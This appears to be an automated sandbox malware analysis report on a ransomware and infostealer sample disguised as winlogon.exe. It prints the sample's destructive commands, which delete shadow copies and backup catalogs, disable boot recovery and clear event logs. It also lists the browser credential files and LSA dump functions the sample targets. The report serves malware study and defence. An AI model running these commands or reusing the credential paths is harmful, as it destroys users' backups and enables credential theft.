Loading ...

Analysis Report

Overview

General Information

Joe Sandbox Version:20.0.0
Analysis ID:46216
Start time:21:37:49
Joe Sandbox Product:CloudBasic
Start date:12.02.2018
Overall analysis duration:0h 8m 27s
Hypervisor based Inspection enabled:false
Report type:full
Sample file name:winlogon.exe
Cookbook file name:default.jbs
Analysis system description:Windows 7 SP1 (with Office 2010 SP2, IE 11, FF 54, Chrome 60, Acrobat Reader DC 17, Flash 26, Java 8.0.1440.1)
Number of analysed new started processes analysed:26
Number of new started drivers analysed:0
Number of existing processes analysed:0
Number of existing drivers analysed:0
Number of injected processes analysed:0
Technologies
  • HCA enabled
  • EGA enabled
  • HDC enabled
Detection:MAL
Classification:mal100.evad.spre.rans.spyw.troj.winEXE@34/9@31/10
HCA Information:
  • Successful, ratio: 97%
  • Number of executed functions: 181
  • Number of non-executed functions: 171
EGA Information:
  • Successful, ratio: 100%
HDC Information:
  • Successful, ratio: 54.9% (good quality ratio 51.4%)
  • Quality average: 79%
  • Quality standard deviation: 29.3%
Cookbook Comments:
  • Adjust boot time
  • Found application associated with file extension: .exe
Warnings:
Show All
  • Connection to analysis system has been lost
  • Exclude process from analysis (whitelisted): conhost.exe, dllhost.exe
  • Report size getting too big, too many NtDeviceIoControlFile calls found.
  • Report size getting too big, too many NtQueryValueKey calls found.


Detection

StrategyScoreRangeReportingDetection
Threshold1000 - 100Report FP / FNmalicious


Confidence

StrategyScoreRangeFurther Analysis Required?Confidence
Threshold50 - 5false
ConfidenceConfidence


Classification

Analysis Advice

All domains contacted by the sample do not resolve. Likely the sample is an old dropper which does no longer work
Sample drops PE files which have not been started, submit dropped PE samples for a secondary analysis to Joe Sandbox
Sample may offer command line options, please run it with the 'Execute binary with arguments' cookbook (it's possible that the command line switches require additional characters like: "-", "/", "--"
Sample tries to load a library which is not present or installed on the analysis machine, adding the library might reveal more behavior



Signature Overview

Click to jump to signature section


AV Detection:

barindex
Antivirus detection for dropped fileShow sources
Source: C:\Users\HERBBL~1\AppData\Local\Temp\_usm.exevirustotal: Detection: 59%Perma Link
Antivirus detection for submitted fileShow sources
Source: winlogon.exevirustotal: Detection: 62%Perma Link

Cryptography:

barindex
Uses Microsoft's Enhanced Cryptographic ProviderShow sources
Source: C:\Users\user\Desktop\winlogon.exeCode function: 1_2_00D64140 CryptAcquireContextW,CryptGenRandom,CryptReleaseContext,1_2_00D64140
Source: C:\Users\user\AppData\Local\Temp\yegus.exeCode function: 2_2_10001D60 GetFileAttributesA,GetTempPathA,GetTempFileNameA,CopyFileA,CryptUnprotectData,HeapAlloc,LocalFree,HeapFree,DeleteFileA,2_2_10001D60
Source: C:\Users\user\AppData\Local\Temp\yegus.exeCode function: 2_2_100010C0 StrStrIW,lstrlenW,CryptAcquireContextA,CryptCreateHash,CryptHashData,CryptDestroyHash,CryptReleaseContext,CryptGetHashParam,wsprintfA,wsprintfA,CryptDestroyHash,CryptReleaseContext,2_2_100010C0
Source: C:\Users\user\AppData\Local\Temp\yegus.exeCode function: 2_2_10001200 StrStrIW,lstrlenW,lstrlenW,lstrlenW,CryptUnprotectData,HeapFree,HeapFree,HeapFree,HeapFree,HeapFree,HeapFree,HeapFree,LocalFree,2_2_10001200

Spam, unwanted Advertisements and Ransom Demands:

barindex
Deletes shadow drive data (may be related to ransomware)Show sources
Source: unknownProcess created: C:\Windows\System32\vssadmin.exe c:\Windows\system32\vssadmin.exe delete shadows /all /quiet
Source: winlogon.exeBinary or memory string: C:\Windows\system32\cmd.exe /c%s %s %sServicesActive%s\*...SeShutdownPrivilegec:\Windows\system32\vssadmin.exedelete shadows /all /quietwbadmin.exedelete catalog -quietbcdedit.exe/set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled nowevtutil.execl Systemcl SecurityH
Source: _usm.exeBinary or memory string: C:\Windows\system32\cmd.exe /c%s %s %sServicesActive%s\*...SeShutdownPrivilegec:\Windows\system32\vssadmin.exedelete shadows /all /quietwbadmin.exedelete catalog -quietbcdedit.exe/set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled nowevtutil.execl Systemcl SecurityH
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\vssadmin.exe c:\Windows\system32\vssadmin.exe delete shadows /all /quiet
Source: cmd.exeBinary or memory string: C:\Windows\system32\cmd.exe /c c:\Windows\system32\vssadmin.exe delete shadows /all /quiet
Source: cmd.exeBinary or memory string: C:\Users\user\Desktop\C:\Windows\system32;;C:\Windows\system32;C:\Windows\system;C:\Windows;.;C:\ProgramData\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c c:\Windows\system32\vssadmin.exe delete shadows /all /quietC:\Windows\system32\cmd.exeWinSta0\Defaulto
Source: cmd.exeBinary or memory string: C:\Windows\system32\cmd.exe /c c:\Windows\system32\vssadmin.exe delete shadows /all /quieth
Source: cmd.exeBinary or memory string: ? c:\Windows\system32\vssadmin.exe delete shadows /all /quiet
Source: cmd.exeBinary or memory string: ?c:\Windows\system32\vssadmin.exe delete shadows /all /quiettemn
Source: cmd.exeBinary or memory string: 9C:\Windows\system32\cmd.exe/cc:\Windows\system32\vssadmin.exedeleteshadows/all/quietESSOR_LEVEL=6PROCESSOR_REVISION=3f02ProgramData=C:\ProgramDataProgramFiles=C:\Program FilesPSModulePath=C:\Windows\system32\WindowsPowerShell\v1.0\Modules\;C:\Program Files\AutoIt3\AutoItXPUBLIC=C:\Users\PublicSystemDrive=C:SystemRoot=C:\WindowsTEMP=C:\Users\HERBBL~1\A(0
Source: vssadmin.exeBinary or memory string: Lc:\Windows\system32\vssadmin.exedeleteshadows/all/quiet,
Source: vssadmin.exeBinary or memory string: c:\Windows\system32\vssadmin.exe delete shadows /all /quiet
Source: vssadmin.exeBinary or memory string: C:\Users\user\Desktop\c:\Windows\system32;;C:\Windows\system32;C:\Windows\system;C:\Windows;.;C:\ProgramData\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\c:\Windows\system32\vssadmin.exec:\Windows\system32\vssadmin.exe delete shadows /all /quietc:\Windows\system32\vssadmin.exe delete shadows /all /quietWinSta0\Default
Source: vssadmin.exeBinary or memory string: Example Usage: vssadmin Delete ShadowStorage
Source: vssadmin.exeBinary or memory string: Example Usage: vssadmin Delete Shadows /Type=ClientAccessible /For=C:
Source: vssadmin.exeBinary or memory string: vssadmin Delete Shadows
Source: vssadmin.exeBinary or memory string: Example Usage: vssadmin Delete Shadows /For=C: /Oldest
Source: vssadmin.exeBinary or memory string: Example Usage: vssadmin Delete ShadowStorage /For=C: /On=D:
Source: _usm.exe.1.drBinary or memory string: C:\Windows\system32\cmd.exe /c%s %s %sServicesActive%s\*...SeShutdownPrivilegec:\Windows\system32\vssadmin.exedelete shadows /all /quietwbadmin.exedelete catalog -quietbcdedit.exe/set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled nowevtutil.execl Systemcl SecurityH
May disable shadow drive data (uses vssadmin)Show sources
Source: unknownProcess created: C:\Windows\System32\vssadmin.exe c:\Windows\system32\vssadmin.exe delete shadows /all /quiet
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\vssadmin.exe c:\Windows\system32\vssadmin.exe delete shadows /all /quiet

Networking:

barindex
Performs DNS lookupsShow sources
Source: unknownDNS traffic detected: queries for: 252.0.0.224.in-addr.arpa
Urls found in memory or binary dataShow sources
Source: yegus.exeString found in binary or memory: file:///C:/jbxinitvm.au3
Source: yegus.exeString found in binary or memory: file:///C:/jbxinitvm.au3s
Source: yegus.exeString found in binary or memory: http://certs.starfieldtech.com/repository/1402
Source: yegus.exeString found in binary or memory: http://crl.comodoca.com/COMODORSACertificationAuthority.crl0q
Source: yegus.exeString found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
Source: yegus.exeString found in binary or memory: http://crl.thawte.com/ThawtePCA-G3.crl0
Source: yegus.exeString found in binary or memory: http://crl4.digicert.com/DigiCertHighAssuranceEVRootCA.crl0=
Source: yegus.exeString found in binary or memory: http://crt.comodoca.com/COMODORSAAddTrustCA.crt0$
Source: yegus.exeString found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
Source: yegus.exeString found in binary or memory: http://ocsp.comodoca.com0
Source: yegus.exeString found in binary or memory: http://ocsp.digicert.com0K
Source: yegus.exeString found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
Source: yegus.exeString found in binary or memory: http://ocsp.thawte.com0
Source: yegus.exeString found in binary or memory: http://s.symcb.com/pca3-g5.crl0
Source: yegus.exeString found in binary or memory: http://s.symcd.com0_
Source: yegus.exeString found in binary or memory: http://t1.symcb.com/ThawtePCA.crl0/
Source: yegus.exeString found in binary or memory: http://t2.symcb.com0A
Source: winlogon.exe, _wjg.exe.1.drString found in binary or memory: http://www.sysinternals.com
Source: yegus.exeString found in binary or memory: https://d.symcb.com/cps0%
Source: yegus.exeString found in binary or memory: https://d.symcb.com/rpa0
Source: yegus.exeString found in binary or memory: https://www.digicert.com/CPS0
Source: yegus.exeString found in binary or memory: https://www.thawte.com/cps0)
Source: yegus.exeString found in binary or memory: https://www.thawte.com/cps07
Tries to resolve domain names, but no domain seems valid (expired dropper behavior)Show sources
Source: unknownDNS traffic detected: query: 252.0.0.224.in-addr.arpa replaycode: Name error (3)
Source: unknownDNS traffic detected: query: 252.0.0.224.in-addr.arpa replaycode: Name error (3)
Source: unknownDNS traffic detected: query: 252.0.0.224.in-addr.arpa replaycode: Name error (3)
Source: unknownDNS traffic detected: query: 252.0.0.224.in-addr.arpa replaycode: Name error (3)
Source: unknownDNS traffic detected: query: 252.0.0.224.in-addr.arpa replaycode: Name error (3)
Source: unknownDNS traffic detected: query: 252.0.0.224.in-addr.arpa replaycode: Name error (3)
Source: unknownDNS traffic detected: query: 252.0.0.224.in-addr.arpa replaycode: Name error (3)
Source: unknownDNS traffic detected: query: 252.0.0.224.in-addr.arpa replaycode: Name error (3)
Source: unknownDNS traffic detected: query: 252.0.0.224.in-addr.arpa replaycode: Name error (3)
Source: unknownDNS traffic detected: query: 252.0.0.224.in-addr.arpa replaycode: Name error (3)
Source: unknownDNS traffic detected: query: 252.0.0.224.in-addr.arpa replaycode: Name error (3)
Source: unknownDNS traffic detected: query: 252.0.0.224.in-addr.arpa replaycode: Name error (3)
Source: unknownDNS traffic detected: query: 252.0.0.224.in-addr.arpa replaycode: Name error (3)
Source: unknownDNS traffic detected: query: 252.0.0.224.in-addr.arpa replaycode: Name error (3)
Source: unknownDNS traffic detected: query: 252.0.0.224.in-addr.arpa replaycode: Name error (3)
Source: unknownDNS traffic detected: query: 252.0.0.224.in-addr.arpa replaycode: Name error (3)
Source: unknownDNS traffic detected: query: 252.0.0.224.in-addr.arpa replaycode: Name error (3)
Source: unknownDNS traffic detected: query: 252.0.0.224.in-addr.arpa replaycode: Name error (3)
Source: unknownDNS traffic detected: query: 252.0.0.224.in-addr.arpa replaycode: Name error (3)
Source: unknownDNS traffic detected: query: 252.0.0.224.in-addr.arpa replaycode: Name error (3)
Source: unknownDNS traffic detected: query: 252.0.0.224.in-addr.arpa replaycode: Name error (3)
Source: unknownDNS traffic detected: query: 252.0.0.224.in-addr.arpa replaycode: Name error (3)
Source: unknownDNS traffic detected: query: 252.0.0.224.in-addr.arpa replaycode: Name error (3)
Source: unknownDNS traffic detected: query: 252.0.0.224.in-addr.arpa replaycode: Name error (3)
Source: unknownDNS traffic detected: query: 252.0.0.224.in-addr.arpa replaycode: Name error (3)
Source: unknownDNS traffic detected: query: 252.0.0.224.in-addr.arpa replaycode: Name error (3)
Source: unknownDNS traffic detected: query: 252.0.0.224.in-addr.arpa replaycode: Name error (3)
Source: unknownDNS traffic detected: query: 252.0.0.224.in-addr.arpa replaycode: Name error (3)
Source: unknownDNS traffic detected: query: 252.0.0.224.in-addr.arpa replaycode: Name error (3)
Source: unknownDNS traffic detected: query: 252.0.0.224.in-addr.arpa replaycode: Name error (3)
Source: unknownDNS traffic detected: query: 252.0.0.224.in-addr.arpa replaycode: Name error (3)
Tries to resolve many domain names, but no domain seems validShow sources
Source: unknownDNS traffic detected: query: 252.0.0.224.in-addr.arpa replaycode: Name error (3)
Source: unknownDNS traffic detected: query: 252.0.0.224.in-addr.arpa replaycode: Name error (3)
Source: unknownDNS traffic detected: query: 252.0.0.224.in-addr.arpa replaycode: Name error (3)
Source: unknownDNS traffic detected: query: 252.0.0.224.in-addr.arpa replaycode: Name error (3)
Source: unknownDNS traffic detected: query: 252.0.0.224.in-addr.arpa replaycode: Name error (3)
Source: unknownDNS traffic detected: query: 252.0.0.224.in-addr.arpa replaycode: Name error (3)
Source: unknownDNS traffic detected: query: 252.0.0.224.in-addr.arpa replaycode: Name error (3)
Source: unknownDNS traffic detected: query: 252.0.0.224.in-addr.arpa replaycode: Name error (3)
Source: unknownDNS traffic detected: query: 252.0.0.224.in-addr.arpa replaycode: Name error (3)
Source: unknownDNS traffic detected: query: 252.0.0.224.in-addr.arpa replaycode: Name error (3)
Source: unknownDNS traffic detected: query: 252.0.0.224.in-addr.arpa replaycode: Name error (3)
Source: unknownDNS traffic detected: query: 252.0.0.224.in-addr.arpa replaycode: Name error (3)
Source: unknownDNS traffic detected: query: 252.0.0.224.in-addr.arpa replaycode: Name error (3)
Source: unknownDNS traffic detected: query: 252.0.0.224.in-addr.arpa replaycode: Name error (3)
Source: unknownDNS traffic detected: query: 252.0.0.224.in-addr.arpa replaycode: Name error (3)
Source: unknownDNS traffic detected: query: 252.0.0.224.in-addr.arpa replaycode: Name error (3)
Source: unknownDNS traffic detected: query: 252.0.0.224.in-addr.arpa replaycode: Name error (3)
Source: unknownDNS traffic detected: query: 252.0.0.224.in-addr.arpa replaycode: Name error (3)
Source: unknownDNS traffic detected: query: 252.0.0.224.in-addr.arpa replaycode: Name error (3)
Source: unknownDNS traffic detected: query: 252.0.0.224.in-addr.arpa replaycode: Name error (3)
Source: unknownDNS traffic detected: query: 252.0.0.224.in-addr.arpa replaycode: Name error (3)
Source: unknownDNS traffic detected: query: 252.0.0.224.in-addr.arpa replaycode: Name error (3)
Source: unknownDNS traffic detected: query: 252.0.0.224.in-addr.arpa replaycode: Name error (3)
Source: unknownDNS traffic detected: query: 252.0.0.224.in-addr.arpa replaycode: Name error (3)
Source: unknownDNS traffic detected: query: 252.0.0.224.in-addr.arpa replaycode: Name error (3)
Source: unknownDNS traffic detected: query: 252.0.0.224.in-addr.arpa replaycode: Name error (3)
Source: unknownDNS traffic detected: query: 252.0.0.224.in-addr.arpa replaycode: Name error (3)
Source: unknownDNS traffic detected: query: 252.0.0.224.in-addr.arpa replaycode: Name error (3)
Source: unknownDNS traffic detected: query: 252.0.0.224.in-addr.arpa replaycode: Name error (3)
Source: unknownDNS traffic detected: query: 252.0.0.224.in-addr.arpa replaycode: Name error (3)
Source: unknownDNS traffic detected: query: 252.0.0.224.in-addr.arpa replaycode: Name error (3)

Stealing of Sensitive Information:

barindex
Contains functionality to dump credential hashes (LSA Dump)Show sources
Source: C:\Users\user\AppData\Local\Temp\ucngw.exeCode function: 3_2_100114D0 LoadLibraryW,RtlInitUnicodeString,GetProcAddress,GetProcAddress,GetProcAddress,LocalAlloc,LocalAlloc,3_2_100114D0
Contains functionality to steal Chrome passwordsShow sources
Source: C:\Users\user\AppData\Local\Temp\yegus.exeCode function: \Google\Chrome\User Data\Default\Login Data2_2_10001FB0
Source: C:\Users\user\AppData\Local\Temp\yegus.exeCode function: \Google\Chrome\User Data\Default\Login Data2_2_10001FB0
Contains functionality to steal Internet Explorer form passwordsShow sources
Source: C:\Users\user\AppData\Local\Temp\yegus.exeCode function: Software\Microsoft\Internet Explorer\IntelliForms\Storage22_2_10082020
Tries to harvest and steal browser information (history, passwords, etc)Show sources
Source: C:\Users\user\AppData\Local\Temp\yegus.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
Source: C:\Users\user\AppData\Local\Temp\yegus.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\4ah7hlda.default\cert8.db
Source: C:\Users\user\AppData\Local\Temp\yegus.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\AppData\Local\Temp\yegus.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\4ah7hlda.default\secmod.db
Source: C:\Users\user\AppData\Local\Temp\yegus.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\4ah7hlda.default\logins.json
Source: C:\Users\user\AppData\Local\Temp\yegus.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\4ah7hlda.default\key3.db

Persistence and Installation Behavior:

barindex
Drops PE filesShow sources
Source: C:\Users\user\Desktop\winlogon.exeFile created: C:\Users\HERBBL~1\AppData\Local\Temp\_yig.exe
Source: C:\Users\user\Desktop\winlogon.exeFile created: C:\Users\HERBBL~1\AppData\Local\Temp\_wjg.exe
Source: C:\Users\user\Desktop\winlogon.exeFile created: C:\Users\HERBBL~1\AppData\Local\Temp\ucngw.exe
Source: C:\Users\user\Desktop\winlogon.exeFile created: C:\Users\HERBBL~1\AppData\Local\Temp\_usm.exe
Source: C:\Users\user\Desktop\winlogon.exeFile created: C:\Users\HERBBL~1\AppData\Local\Temp\yegus.exe
May use bcdedit to modify the Windows boot settingsShow sources
Source: winlogon.exeBinary or memory string: C:\Windows\system32\cmd.exe /c%s %s %sServicesActive%s\*...SeShutdownPrivilegec:\Windows\system32\vssadmin.exedelete shadows /all /quietwbadmin.exedelete catalog -quietbcdedit.exe/set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled nowevtutil.execl Systemcl SecurityH
Source: _usm.exeBinary or memory string: bcdedit.exe
Source: _usm.exeBinary or memory string: C:\Windows\system32\cmd.exe /c%s %s %sServicesActive%s\*...SeShutdownPrivilegec:\Windows\system32\vssadmin.exedelete shadows /all /quietwbadmin.exedelete catalog -quietbcdedit.exe/set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled nowevtutil.execl Systemcl SecurityH
Source: cmd.exeBinary or memory string: 'Abcdedit.exeV
Source: cmd.exeBinary or memory string: 'Cbcdedit.exe
Source: cmd.exeBinary or memory string: bcdedit.exe
Source: cmd.exeBinary or memory string: indows\system32\bcdedit.exe
Source: cmd.exeBinary or memory string: bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no
Source: cmd.exeBinary or memory string: C:\Windows\system32\bcdedit.exeath\bcdedit.exe*}
Source: cmd.exeBinary or memory string: bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures B
Source: cmd.exeBinary or memory string: 1C:\Windows\system32\bcdedit.exe\??\C:\Windows\system32\bcdedit.exe
Source: cmd.exeBinary or memory string: >C:\Windows\system32\cmd.exe/cbcdedit.exe/set{default}bootstatuspolicyignoreallfailures&bcdedit/set{default}recoveryenablednoamFiles=C:\Program FilesPSModulePath=C:\Windows\system32\WindowsPowerShell\v1.0\Modules\;C:\Program Files\AutoIt3\AutoItXPUBLIC=C:\Users\PublicSystemDrive=C:SystemRoot=C:\WindowsTEMP=C:\Users\HERBBL~1\AppData\Local\TempTMP=C:\Users\HERBBL~1\AppData\Local\TempUSERDOMAIN=computerUSERNAME=userUSERPROFILE=C:\Users\userwindir=C:\Windowswindows_tracing_flags=3windows_tracing_logfile=C:\BV
Source: cmd.exeBinary or memory string: C:\Windows\system32\bcdedit.exe
Source: cmd.exeBinary or memory string: InternalNamebcdedit.exe
Source: cmd.exeBinary or memory string: OriginalFilenamebcdedit.exej%
Source: cmd.exeBinary or memory string: C:\Windows\system32\cmd.exe /c bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no
Source: cmd.exeBinary or memory string: C:\Users\user\Desktopbcdedit.exeB
Source: cmd.exeBinary or memory string: indows\system32\bcdedit.exe.0\7
Source: cmd.exeBinary or memory string: C:\Windows\system32\bcdedit.exeath\bcdedit*B
Source: cmd.exeBinary or memory string: C:\Users\user\Desktop\C:\Windows\system32;;C:\Windows\system32;C:\Windows\system;C:\Windows;.;C:\ProgramData\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled noC:\Windows\system32\cmd.exeWinSta0\Defaultf
Source: cmd.exeBinary or memory string: C:\Windows\system32\cmd.exe /c bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled noa
Source: cmd.exeBinary or memory string: C:\Users\user\Desktop\C:\Windows\system32;C:\Windows\system32;C:\Windows\system;C:\Windows;.;C:\ProgramData\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\bC:\Windows\system32\bcdedit.exebcdedit /set {default} recoveryenabled nobcdedit /set {default} recoveryenabled nodWinSta0\Default=C:=C:\Users\user\Desktop=ExitCode=00000000=Z:=Z:\ALLUSERSPROFILE=C:\ProgramDataAPPDATA=C:\Users\user\AppData\RoamingCommonProgramFiles=C:\Program Files\Common FilesCOMPUTERNAME=computerComSpec=C:\Windows\system32\cmd.exeFP_NO_HOST_CHECK=NOHOMEDRIVE=C:HOMEPATH=\Users\userLOCALAPPDATA=C:\Users\user\AppData\LocalLOGONSERVER=\\computerNUMBER_OF_PROCESSORS=1OS=Windows_NTPath=C:\ProgramData\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSCPROCESSOR_ARCHITECTURE=x86PROCESSOR_IDENTIFIER=x
Source: bcdedit.exeBinary or memory string: Microsoft.Windows.OSLoader.BCDEdit,processorArchitecture="x86",type="win32",version="5.1.0.0"C:\Windows\system32\bcdedit.exeGsHd(
Source: bcdedit.exeBinary or memory string: @bcdedit.exe/set{default}bootstatuspolicyignoreallfailuresackburnLOCALAPPDATA=C:\Users\user\AppData\LocalLOGONSERVER=\\computerNUMBER_OF_PROCESSORS=1OS=Windows_NTPath=C:
Source: bcdedit.exeBinary or memory string: bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures
Source: bcdedit.exeBinary or memory string: C:\Users\user\Desktop\C:\Windows\system32;C:\Windows\system32;C:\Windows\system;C:\Windows;.;C:\ProgramData\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\C:\Windows\system32\bcdedit.exebcdedit.exe /set {default} bootstatuspolicy ignoreallfailures bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures WinSta0\Default
Source: bcdedit.exeBinary or memory string: \Device\HarddiskVolume2\Windows\System32\bcdedit.exe;##
Source: bcdedit.exeBinary or memory string: bcdedit.exeBC:\Users\user\Desktop\
Source: bcdedit.exeBinary or memory string: Microsoft.Windows.OSLoader.BCDEdit,processorArchitecture="x86",type="win32",version="5.1.0.0"C:\Windows\system32\bcdedit.exeGsHd(
Source: bcdedit.exeBinary or memory string: bcdedit.exeBC:\Users\user\Desktop\
Source: bcdedit.exeBinary or memory string: C:\Users\user\Desktop\C:\Windows\system32;C:\Windows\system32;C:\Windows\system;C:\Windows;.;C:\ProgramData\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\C:\Windows\system32\bcdedit.exebcdedit /set {default} recoveryenabled nobcdedit /set {default} recoveryenabled noWinSta0\Defaulti
Source: bcdedit.exeBinary or memory string: hj4`=\Device\HarddiskVolume2\Windows\System32\bcdedit.exe;##
Source: _usm.exe.1.drBinary or memory string: C:\Windows\system32\cmd.exe /c%s %s %sServicesActive%s\*...SeShutdownPrivilegec:\Windows\system32\vssadmin.exedelete shadows /all /quietwbadmin.exedelete catalog -quietbcdedit.exe/set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled nowevtutil.execl Systemcl SecurityH
Uses bcdedit to modify the Windows boot settingsShow sources
Source: unknownProcess created: C:\Windows\System32\bcdedit.exe bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures
Source: unknownProcess created: C:\Windows\System32\bcdedit.exe bcdedit /set {default} recoveryenabled no
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\bcdedit.exe bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\bcdedit.exe bcdedit /set {default} recoveryenabled no

Data Obfuscation:

barindex
Contains functionality to dynamically determine API callsShow sources
Source: C:\Users\user\Desktop\winlogon.exeCode function: 1_2_00D643A0 GetVersionExW,LoadLibraryW,GetProcAddress,SHGetKnownFolderPath,1_2_00D643A0
Uses code obfuscation techniques (call, push, ret)Show sources
Source: C:\Users\user\Desktop\winlogon.exeCode function: 1_2_00D6B696 push ecx; ret 1_2_00D6B6A9
Source: C:\Users\user\AppData\Local\Temp\yegus.exeCode function: 2_2_013348F6 push ecx; ret 2_2_01334909
Source: C:\Users\user\AppData\Local\Temp\yegus.exeCode function: 2_2_10083436 push ecx; ret 2_2_10083449
Source: C:\Users\user\AppData\Local\Temp\ucngw.exeCode function: 3_2_00C51CE6 push ecx; ret 3_2_00C51CF9
Source: C:\Users\user\AppData\Local\Temp\ucngw.exeCode function: 3_2_10001966 push ecx; ret 3_2_10001979
Source: C:\Users\user\AppData\Local\Temp\_usm.exeCode function: 4_2_00142CC5 push ecx; ret 4_2_00142CD8

Spreading:

barindex
Contains functionality to enumerate / list files inside a directoryShow sources
Source: C:\Users\user\Desktop\winlogon.exeCode function: 1_2_00D75F8F FindFirstFileExW,1_2_00D75F8F
Source: C:\Users\user\AppData\Local\Temp\yegus.exeCode function: 2_2_01339A82 FindFirstFileExW,2_2_01339A82
Source: C:\Users\user\AppData\Local\Temp\yegus.exeCode function: 2_2_10088620 FindFirstFileExA,2_2_10088620
Source: C:\Users\user\AppData\Local\Temp\ucngw.exeCode function: 3_2_00C5850A FindFirstFileExW,3_2_00C5850A
Source: C:\Users\user\AppData\Local\Temp\ucngw.exeCode function: 3_2_10008EEC FindFirstFileExA,3_2_10008EEC
Source: C:\Users\user\AppData\Local\Temp\_usm.exeCode function: 4_2_00141441 wsprintfW,FindFirstFileW,GetProcessHeap,PathAppendW,GetProcessHeap,HeapAlloc,PathAppendW,PathAppendW,StrCmpCW,StrCmpCW,StrCmpCW,CreateFileW,GetFileSizeEx,CloseHandle,GetProcessHeap,HeapFree,FindNextFileW,FindClose,4_2_00141441
Creates COM task schedule object (often to register a task for autostart)Show sources
Source: C:\Windows\System32\wbengine.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
Source: C:\Windows\System32\wbengine.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
Source: C:\Windows\System32\wbengine.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\Progid
Source: C:\Windows\System32\wbengine.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\Progid
Source: C:\Windows\System32\wbengine.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
Source: C:\Windows\System32\wbengine.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32
Source: C:\Windows\System32\wbengine.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler
Source: C:\Windows\System32\wbengine.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
Source: C:\Windows\System32\wbengine.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
Found PSEXEC tool (often used for remote process execution)Show sources
Source: winlogon.exeString found in binary or memory: PsExec executes a program on a remote system, where remotely executed console
Source: _wjg.exe.1.drString found in binary or memory: PsExec executes a program on a remote system, where remotely executed console

System Summary:

barindex
Submission file is bigger than most known malware samplesShow sources
Source: winlogon.exeStatic file information: File size 1861632 > 1048576
PE file has a big raw sectionShow sources
Source: winlogon.exeStatic PE information: Raw size of .rsrc is bigger than: 0x100000 < 0x195c00
PE file contains a mix of data directories often seen in goodwareShow sources
Source: winlogon.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: winlogon.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: winlogon.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: winlogon.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
